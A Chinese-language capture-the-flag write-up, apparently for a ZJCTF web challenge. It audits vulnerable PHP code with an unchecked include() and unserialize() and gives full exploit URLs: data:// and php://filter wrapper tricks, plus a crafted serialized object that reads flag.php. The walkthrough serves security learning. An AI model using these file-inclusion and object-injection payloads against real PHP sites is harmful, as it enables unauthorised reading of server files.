题目环境：

<?php  
  $text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
  echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
  if(preg_match("/flag/",$file)){
    echo "Not now!";
    exit(); 
  }else{
    include($file);  //useless.php
    $password = unserialize($password);
    echo $password;
  }
}
else{
  highlight_file(__FILE__);
}
?>

PHP代码审计

三个通过GET方式传参的参数text、file、password
file_get_contents() 函数把整个文件读入一个字符串中。
'r’代表读取内容
&&左右两边条件都要满足，===PHP强比较，类型和值都要相等
满足第一个参数就会输出这段字符串
从这里可以看出，需要用到PHP伪协议中的data协议
第二个参数file就是遇到的就是**正则匹配，**flag关键字被过滤了
当出现flag关键字时，程序就会自动退出，不再进行
反之，如果绕过正则的话，就包含咱们传给file参数的文件
可以看出作者注释里面给的有一个文件，useless.php
下面是对password参数进行反序列化
从这里可以猜出，useless.php文件可能包含的是反序列化内容
然后file参数和password参数联系起来就一目了然了（这里正则并没有用可以直接绕过）
猜测啊，file=useless.php，才能进入password参数那部分（后面可以给大家测试看看）

作者很贴心，打开题目给的有题目源码


当然咱们还可以通过data伪协议和php://filter伪协议去查看useless.php的源码

php://filter伪协议详解文末会给链接
base64编解码文末也会给链接

data协议规则：
data://text/plain;编码格式,读取内容
（注意一个是分号;命令拼接，和一个逗号,用来读取文本内容）

如果要读取后边的文件内容，字符串也要进行相应的编码
这里猜测useless.php文件是base64编码格式
所以使用base64编码格式

构造payload：
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

送去base64解码

useless.php源代码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?> 

较为简单的序列化，直接给参数file赋值flag.php即可

进行序列化

<?php  

class Flag{  //flag.php  
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$flag=new Flag();
echo serialize($flag);
?> 

构造最终payload：
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
上传payload：

这里表明三个参数都已符合了条件

F12查看源码：

得到flag：
flag{8fa13eb3-db41-4230-be27-634236f2fe1b}

这里再说明以下，为什么给file参数赋值useless.php，因为你进入了useless.php才能进入password参数那一步！
同时也绕过了正则

我们可以测试一下给file参数传inde.php文件会怎样
payload：
?text=data://text/plain,welcome to the zjctf&file=index.php

?text=data://text/plain,welcome to the zjctf&file=index.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

可以看出，当参数file赋值为index.php文件的时候，一直执行的是index代码内容
那么当参数file赋值为useless.php文件的时候，才会去执行参数password的内容

php://filter伪协议可参考：https://blog.csdn.net/m0_73734159/article/details/130383801?spm=1001.2014.3001.5501
PHP序列化魔法函数可参考：https://blog.csdn.net/m0_73734159/article/details/133854073?spm=1001.2014.3001.5502
PHP强比较可参考：https://blog.csdn.net/m0_73734159/article/details/134349129?spm=1001.2014.3001.5501
base64编码解码网站：https://c.runoob.com/front-end/693/
【Kali终端也可通过命令进行base64解码】（echo “bae64编码内容” | base64 -d）